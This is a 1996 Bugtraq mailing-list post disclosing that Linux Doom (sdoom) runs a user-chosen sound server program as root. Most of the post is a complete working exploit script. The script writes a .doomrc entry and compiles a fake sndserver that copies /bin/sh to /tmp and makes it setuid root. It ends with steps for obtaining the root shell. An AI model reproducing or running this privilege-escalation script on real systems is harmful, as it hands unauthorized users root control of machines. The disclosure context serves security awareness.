[3805] in bugtraq
Re: Linux: killmouse/doom
daemon@ATHENA.MIT.EDU (Bo)
Tue Dec 17 14:14:19 1996
Date: Tue, 17 Dec 1996 10:18:24 +0100
Reply-To: Bo <bo@ebony.iaehv.nl>
From: Bo <bo@ebony.iaehv.nl>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
> From: Joe Zbiciak <im14u2c@cegt201.bradley.edu>
> Subject: Re: Linux: exploit for killmouse.
>
> Which reminds me, there's a bigger hole in Doom. It doesn't drop its
> root permissions soon enough! The user is allowed to set a sound server
> in his/her .doomrc. Normally, this is set to "sndserver". Howver, this
> can be set to *any* program, and that program runs as root!!
Yes, very true. And just in case anybody collects these scripts, here's
the obvious one:
#!/bin/sh
# Tue Dec 17 10:02:20 MET 1996 Bo
echo 'sndserver "/tmp/sndserver"' > .doomrc
cat > /tmp/sndserver.c << EOF
#include <stdio.h>
#include <unistd.h>
main() {
if (fork()) while (getc(stdin));
else system("cp /bin/sh /tmp; chmod +s /tmp/sh");
/* or whatever you like to do */
}
EOF
gcc /tmp/sndserver.c -o /tmp/sndserver
The fork() is just so that doom runs on nicely without locking up the
keyboard and sndserver gobbles up all the sound data send to it. Run
the script, start sdoom, quit the normal way, and execute /tmp/sh.
Thanks for pointing it out, Joe.
Regards,
Bo.
--
"Heisenberg may have been here".
